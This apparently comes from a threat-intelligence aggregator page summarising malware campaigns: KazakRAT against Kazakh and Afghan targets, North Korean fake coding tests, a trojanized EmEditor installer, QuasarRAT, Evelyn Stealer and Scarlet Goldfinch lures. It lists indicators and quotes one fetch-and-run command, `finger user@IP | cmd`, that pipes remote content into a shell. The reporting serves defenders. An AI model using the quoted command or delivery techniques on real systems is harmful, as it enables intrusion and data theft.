State-Linked Malware Campaigns Using Social Engineering and Trojanized Installers
Multiple reports detailed state-linked intrusion activity relying on social engineering and trusted delivery mechanisms to gain initial access and establish remote control. Researchers reported a suspected state-affiliated espionage operation targeting government and financial organizations in Kazakhstan and Afghanistan, built around a previously unreported Windows DLL implant dubbed KazakRAT delivered via malicious MSI installers and decoy documents (e.g., a fake Kazakh presidential letter and an Afghan provincial memo). The malware was described as relatively unsophisticated—unencrypted HTTP beaconing and minimal obfuscation—yet capable of host reconnaissance, file search/exfiltration, and downloading/executing additional payloads, enabling long-running access since at least 2022.
Separately, Insikt Group described North Korean operators (tracked as PurpleBravo) running the “Contagious Interview” campaign, using fake recruiter personas and weaponized “coding tests” hosted on platforms like GitHub to trick software developers into executing malware on corporate devices, supporting software supply-chain targeting. The toolset reportedly includes BeaverTail (JavaScript infostealer) and newly identified RATs PylangGhost and GolangGhost. In another supply-chain style incident, Trend research and an Emurasoft advisory reported the official EmEditor download being tampered with to serve a trojanized MSI whose CustomAction launched PowerShell to fetch staged payloads from lookalike domains (e.g., EmEditorjp[.]com, EmEditorgb[.]com, EmEditorde[.]com), followed by environment fingerprinting and geofencing checks—highlighting ongoing risk from compromised public software distribution channels.
Related Entities
Threat Actors
Organizations
Affected Products
Sources
Related Stories
Social-engineering malware campaigns delivering remote-access trojans and backdoors
Recent reporting highlights multiple **social-engineering-driven malware delivery** efforts that culminate in remote access and persistent compromise. In South Korea, attackers distributed **counterfeit adult games** via popular “webhard” file-sharing services; victims received a ZIP containing a decoy `Game.exe` launcher that stages additional components (`Data1.Pak`, `Data2.Pak`, `Data3.Pak`) and ultimately injects **QuasarRAT** (aka **xRAT**), enabling host profiling, keylogging, and unauthorized file transfer. The execution chain included masqueraded artifacts such as `GoogleUpdate.exe` and `WinUpdate.db`, with AES used to decrypt/extract shellcode prior to privilege escalation and RAT injection. Separately, a spear-phishing campaign weaponized news about a purported **Nicolás Maduro arrest** to deliver a **backdoor**: emails carried a ZIP with a lure executable (`Maduro to be taken to New York.exe`) alongside a malicious DLL (`kuguo.dll`) that abuses a legitimate KuGuo binary for execution. Post-run behavior included replication to `C:\ProgramData\Technology360NB`, persistence via an auto-start renamed binary (`DataTechnology.exe`), and C2 beaconing for tasking and configuration updates; researchers noted tradecraft consistent with **Mustang Panda** but said attribution was not yet confirmed. A separate research note described **GravityRAT** reemerging as a multi-platform RAT with expanded **Android** targeting (in addition to Windows/macOS), emphasizing mobile endpoints as increasingly high-value targets for data theft and persistent access, though it did not describe the same specific campaigns as the Windows-focused lures above.
2 months ago
Windows Malware Campaigns Using Social Engineering and Legitimate Platforms to Deliver RATs, Stealers, and Proxyware
Multiple research reports detailed **Windows-focused malware delivery chains** that rely on social engineering and abuse of legitimate services to blend into normal enterprise traffic. FortiGuard Labs described a **multi-stage campaign targeting users in Russia** that starts with business-themed decoy documents and scripts, then escalates to security-control bypass and surveillance before deploying **Amnesia RAT** and ultimately **ransomware** with widespread file encryption. A notable technique in that intrusion is the abuse of **Defendnot** (a Windows Security Center trust-model research tool) to **disable Microsoft Defender**, while payloads are hosted modularly across public cloud services (e.g., **GitHub** for scripts and **Dropbox** for binaries) to improve resilience and complicate takedowns. Separately, ReliaQuest reported attackers using **LinkedIn private messages** to build trust with targets and deliver a **WinRAR SFX** that triggers **DLL sideloading** via a legitimate PDF reader, then establishes persistence (Registry `Run` key) and executes **Base64-encoded shellcode in-memory** to load a RAT-like payload. Trend Micro and Koi Security documented **Evelyn Stealer**, which weaponizes **malicious VS Code extensions** to drop a downloader DLL (e.g., `Lightshot.dll`), run hidden PowerShell to fetch `runtime.exe`, and inject the stealer into `grpconv.exe`, exfiltrating data (credentials, cookies, wallets, screenshots, Wi‑Fi credentials) to `server09.mentality[.]cloud` over FTP. AhnLab ASEC also reported **proxyjacking** activity in South Korea attributed to **Larva‑25012**, distributing **proxyware disguised as a Notepad++ installer** and evolving evasion (e.g., injecting into Windows Explorer and using Python-based loaders) to monetize victims’ bandwidth via unauthorized proxyware installation.
1 months ago
Malware Delivery via Social Engineering: Phishing Lures, Fake Browser Alerts, and Paste-and-Run Payloads
Multiple threat reports describe **social-engineering-driven malware delivery** leading to remote access and follow-on payload deployment. Fortinet observed a **multi-stage phishing campaign targeting users in Russia** that delivers **Amnesia RAT** and ransomware via business-themed decoy documents and a malicious `.lnk` shortcut using a double extension (e.g., `*.txt.lnk`). The infection chain uses public cloud services for staging—**GitHub** for scripts and **Dropbox** for binary payloads—and abuses **defendnot** to trick Windows into believing a third-party AV is installed, effectively disabling **Microsoft Defender** before later-stage execution. Separately, Huntress attributed activity to **KongTuke**, which uses **malicious browser extensions** to display fake “browser crash” security alerts (“**CrashFix**”) that pressure users into running attacker-provided commands, and also deploys a Python RAT dubbed **ModeloRAT**. ModeloRAT is described as heavily obfuscated, using **Windows Registry** persistence and **RC4**-encrypted communications, with the ability to deliver additional payloads (DLLs, executables, scripts). Red Canary’s January intelligence update highlights **Scarlet Goldfinch** activity using **paste-and-run** lures and a notable technique of using the Windows `finger` client to pull remote content (e.g., `finger user@IP | cmd`), followed by `curl` download of an archive masquerading as a PDF and extraction via `tar -xf`, culminating in **Remcos** (and sometimes **NetSupport**) delivered via **DLL sideloading**.
1 months ago